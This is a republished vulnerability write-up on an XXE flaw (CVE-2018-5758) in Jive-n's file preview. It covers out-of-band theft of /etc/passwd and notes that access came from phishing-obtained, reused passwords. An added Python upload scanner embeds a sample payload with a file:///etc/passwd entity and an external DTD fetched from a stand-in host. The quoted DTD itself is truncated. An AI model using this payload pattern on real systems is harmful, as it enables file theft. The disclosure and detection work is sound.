
How to analyze an XXE vulnerability in Jive-n

2025-01-25 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article explains how to analyze an XXE vulnerability in Jive-n. The content is quite detailed; interested readers can refer to it, and we hope it is helpful.

An XML external entity injection (XXE) vulnerability that we found in Jive Software's Jive-n platform, CVE-2018-5758, is described below.

Researchers at Rhino Security Labs recently discovered an XML external entity injection (XXE) vulnerability in Jive-n, an intranet communication platform for enterprise employees. The vulnerability lies in the application's file upload function: by uploading a Microsoft Word document with an embedded XXE payload, an attacker can read the contents of arbitrary files and directories on the target operating system.

Background: Jive-n and Jive Software

Jive-n is a product of Jive Software: intranet social communication software that helps employees interact with each other over the company intranet. It can be used either as a SaaS product or as an internal, self-managed application. In the course of our research we found a live Jive-n instance, although the instance was not actively being used. We had obtained login credentials (through password reuse) during a phishing engagement, so we could log in directly to the application.

Identify potential security issues

One of Jive-n's functions is uploading files and sharing them with other employees on the intranet. Before an uploaded file is published, the application attempts to display its contents through a Flash object on the page. After initial testing with ordinary Microsoft Office documents, we suspected there might be an XXE vulnerability.

XXE server configuration

The payload first defines an XML entity pointing to a local file path on the target system, and then uses an external entity to send an HTTP request to our external server. Our server responds with a document type definition (DTD) that instructs the application server to send the previously defined entity (the local file) to our external server over FTP. We generated the document with the tool "oxml_xxe" [download address]. Our target file was file:///etc/passwd.

On our XXE server (developed by Rhino Security researchers [portal]), we set up an HTTP listener on port 80 and an FTP listener on port 8080, ready to handle the incoming requests correctly. The DTD we used is as follows:

% all

Successful exploitation of XXE vulnerability

Our target application did not appear to have seen much recent activity, so we planned to upload a "hidden" file that would not be exposed to all users of the application. One of Jive-n's features lets users preview the contents of an uploaded file before publishing it: it uses Flash to try to render uploaded Microsoft Office documents (Word, Excel and PowerPoint) in the browser.

We first uploaded the malicious document and used the "Save draft" feature to try to get Jive-n to render its contents. That was unsuccessful, but Jive-n displayed an error message together with options to "view" or "download" the file.

Normally the XML would have been parsed and the payload executed at this point, but that was not the case here. In fact, our server received no request until we clicked the "View" option shown in the figure above. After clicking it, the payload executed successfully and the file contents were sent to our XXE server.

Three main things happen in the screenshot above:

1. The content in the blue box is the initial HTTP request sent to our server by the application server.

2. The content in the green box is our server's response to that request.

3. The content in the orange box is a small portion of the data sent to us over the FTP connection.

We also found that requesting the path file:///etc/ returns a directory listing of /etc.

Potential mitigation options

Jive-n administrators can use antivirus software to scan user-uploaded files, but this does not guarantee that a specially crafted payload will be detected (untested). Antivirus products can, however, detect the out-of-band connection, the reading of operating system files, or the use of the FTP protocol. The impact of this attack is mitigated when such products are used and XML external entities are disabled in the parser.
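A defender-side complement to the mitigations above, added here as an example and not part of the original article or of Jive's code: an upload pre-filter in Python that unpacks an Office document (a ZIP of XML parts) and rejects it if any part declares a DOCTYPE or an entity, or tries to trigger an external fetch, using the declaration callbacks of Python's stdlib expat parser rather than trusting the renderer's parser to have external entities disabled. The two sample parts, the `dtd.example` host and the `urn:constructed` namespace are constructed for the demonstration.

```python
import io
import zipfile
import xml.parsers.expat as expat

# Constructed sample parts (not real Word files): one carrying the kind of payload the
# article describes (external entity plus external parameter entity), one ordinary one.
MALICIOUS_PART = b"""<?xml version="1.0"?>
<!DOCTYPE doc [
  <!ENTITY passwd SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://dtd.example/evil.dtd">
  %dtd;
]>
<doc>&passwd;</doc>"""
CLEAN_PART = b'<?xml version="1.0" standalone="yes"?><w:document xmlns:w="urn:constructed"><w:body/></w:document>'

def scan_xml_part(data: bytes) -> list:
    """Findings for one XML part; an empty list means no DTD or entity declarations at all."""
    findings = []
    parser = expat.ParserCreate()
    # A legitimate OOXML part never carries a DOCTYPE, so its mere presence is a finding.
    parser.StartDoctypeDeclHandler = lambda name, sysid, pubid, internal: findings.append(
        f"DOCTYPE {name!r} declared (external id {sysid!r})")
    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        findings.append(f"{'external' if sysid else 'internal'} "
                        f"{'parameter' if is_param else 'general'} entity {name!r} -> {sysid}")
    def on_external_ref(context, base, sysid, pubid):
        findings.append(f"external fetch attempted: {sysid}")
        return 0  # returning 0 makes expat abort instead of resolving the entity
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    try:
        parser.Parse(data, True)
    except expat.ExpatError as err:
        if not findings:  # a parse error we did not provoke is also grounds to reject
            findings.append(f"malformed XML: {err}")
    return findings

def scan_office_upload(blob: bytes) -> dict:
    """Map each XML part inside an OOXML zip to its findings; clean parts are omitted."""
    report = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for name in zf.namelist():
            if name.lower().endswith((".xml", ".rels")):
                if hits := scan_xml_part(zf.read(name)):
                    report[name] = hits
    return report

def build_sample(document_xml: bytes) -> bytes:
    """Wrap one document.xml in a minimal zip shaped like a .docx (constructed, not a real file)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()
```

An empty report means the upload may be passed on to the renderer; any finding should block the preview and be logged, since the same file would otherwise trigger the out-of-band connections described above.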

Vendor fix for CVE-2018-5758

According to the vendor, the latest SaaS version of Jive-n has fixed this XXE injection vulnerability and disabled access to remote DTDs. The application's XML parser no longer processes external entities, so users of the SaaS version of Jive-n are no longer affected by this vulnerability.

This concludes our look at how to analyze an XXE vulnerability in Jive-n. We hope the above content is helpful and lets you learn something new; if you found the article useful, share it so more people can see it.

© 2024 shulou.com SLNews company. All rights reserved.
